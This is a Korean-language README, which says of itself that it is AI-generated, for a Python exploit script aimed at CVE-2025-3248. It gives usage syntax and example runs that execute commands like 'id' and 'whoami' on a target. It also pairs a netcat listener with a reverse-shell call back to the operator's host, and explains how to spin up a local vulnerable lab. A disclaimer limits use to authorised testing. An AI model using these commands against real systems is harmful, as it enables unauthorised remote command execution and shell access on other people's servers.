
이 Python 스크립트는 CVE-2025-3248을 악용하여 취약한 시스템에서 임의의 명령을 실행하거나 리버스 셸을 생성합니다. 이 익스플로잇을 사용하려면 인증이 필요합니다.
이 Python 스크립트는 CVE-2025-3248을 악용하여 취약한 시스템에서 임의의 명령을 실행하거나 리버스 셸을 생성합니다. 이 익스플로잇을 사용하려면 인증이 필요합니다.
requests 라이브러리다음 명령으로 종속성을 설치합니다:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
* 리버스 셸을 위해 명령(-c) 또는 --lhost와 --lport를 모두 지정해야 합니다.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
자신의 머신에서 리스너를 시작합니다:
nc -lvnp 4444
그런 다음 실행합니다:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
다음 명령을 사용하여 Docker 이미지를 배포할 수 있습니다:
podman compose up -d
이미지는 http://localhost:7860에서 사용할 수 있습니다.
compose 파일 크레딧: 이 저장소
이 스크립트는 교육 및 공인된 침투 테스트 목적으로만 사용됩니다. 소유하지 않거나 명시적 테스트 권한이 없는 시스템에는 사용하지 마십시오.
이 readme는 AI로 생성되었습니다.
| 인수 | 설명 | 필수 |
|---|
-u, --url | 대상 기본 URL (예: https://target.com) | 예 |
-l, --login | 관리자 사용자 이름 | 예 |
-p, --password | 관리자 비밀번호 | 예 |
-c, --command | 대상에서 실행할 명령 | 아니요* |
--proxy | 프록시 URL (예: http://127.0.0.1:8080) | 아니요 |
--lhost | 리버스 셸용 로컬 호스트 | 아니요* |
--lport | 리버스 셸용 로컬 포트 | 아니요* |